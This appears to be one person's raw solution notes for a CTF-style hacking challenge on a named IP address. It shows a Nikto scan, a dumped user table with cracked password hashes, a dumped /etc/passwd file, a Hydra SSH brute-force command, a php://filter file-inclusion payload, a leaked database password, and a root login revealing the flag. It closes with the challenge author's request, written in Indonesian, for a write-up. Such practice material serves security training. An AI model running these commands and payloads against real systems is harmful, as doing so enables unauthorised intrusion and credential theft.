https://github.com/laztname/SVWA
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://forum.surabayahackerlink.org/d/3462-new-challenges-underground




http://139.99.107.69/readme.txt

http://139.99.107.69/x.txt








nikto -h 139.99.107.69

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          139.99.107.69
+ Target Hostname:    139.99.107.69
+ Target Port:        80
+ Start Time:         2020-05-20 18:42:33 (GMT7)
---------------------------------------------------------------------------
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /readme.txt: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-05-20 18:45:16 (GMT7) (163 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

+-----------+
| m_message |
| m_post    |
| m_user    |
+-----------+

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] svwa

Database: svwa                                                                                                                               
Table: m_user
[11 entries]
+------+---------------+----------+---------------------------------------------+
| id   | profile       | username | password                                    |
+------+---------------+----------+---------------------------------------------+
| 1    | image.php.jpg | admin    | 89a4b5bd7d02ad1e342c960e6a98365c (anu)      |
| 2    | <blank>       | abc      | 900150983cd24fb0d6963f7d28e17f72 (abc)      |
| 3    | <blank>       | def      | 4ed9407630eb1000c0f6b63842defa7d (def)      |
| 4    | <blank>       | ghi      | 826bbc5d0522f5f20a1da4b60fa8c871 (ghi)      |
| 5    | <blank>       | tes      | b93939873fd4923043b9dec975811f66 (tes123)   |
| 6    | image.php.jpg | admin    | 21232f297a57a5a743894a0e4a801fc3 (admin)    |
| 7    | <blank>       | ash      | 2852f697a9f8581725c6fc6a5472a2e5 (ash)      |
| 8    | my.php.jpg    | arn      | 73578a9ef58da464f85f6223b683299a (arn)      |
| 9    | hai.jpeg      | testpack | 6326579ff8707cf0e983828ef3ce035c (testpack) |
| 10   | <blank>       | aa       | 4124bc0a9335c27f086f24ba207a4912 (aa)       |
| 11   | <blank>       | a        | 0cc175b9c0f1b6a831c399e269772661 (a)        |
+------+---------------+----------+---------------------------------------------+

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
human:x:1000:1000:human,,,:/home/human:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin

hydra -l human -P /usr/share/wordlists/rockyou.txt 139.99.107.69 ssh

view-source:http://139.99.107.69/svwa/admin/index.php?file=php://filter/convert.base64-encode/resource=index.php

ssh user@192.168.1.1 -p 26


    $host = "localhost";
    $dbname = "svwa";
    $username = "human";
    $password = "L1feIs))((";


find / -writable -type d 2>/dev/null


ssh -i idrsa root@139.99.107.69 -p 2222
Linux underground 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 20 05:12:59 2020 from 127.0.0.1
root@underground:~# ls
root.txt
root@underground:~# cat root.txt 
Congratulation you got the root access !!!

root flag: d8ed4289f79df69911a46240e55eb494

Jika kalian sudah mendapatkan akses root, silahkan kalian buat laporan yang pada intinya menjelaskan celah yan yang dari tidak mempunyai akses hingga mendapatkan root, silahkan tambahkan poin lain jika perlu, tidak ada srapi dan detail semakin nyaman untuk dibaca
kemudian kirim laporan tersebut dalam bentuk pdf ke telegram saya di @laztname

P.s hal ini tidak berlaku jika kalian menggunakan forensic atau init=/bin/bash
root@underground:~# 
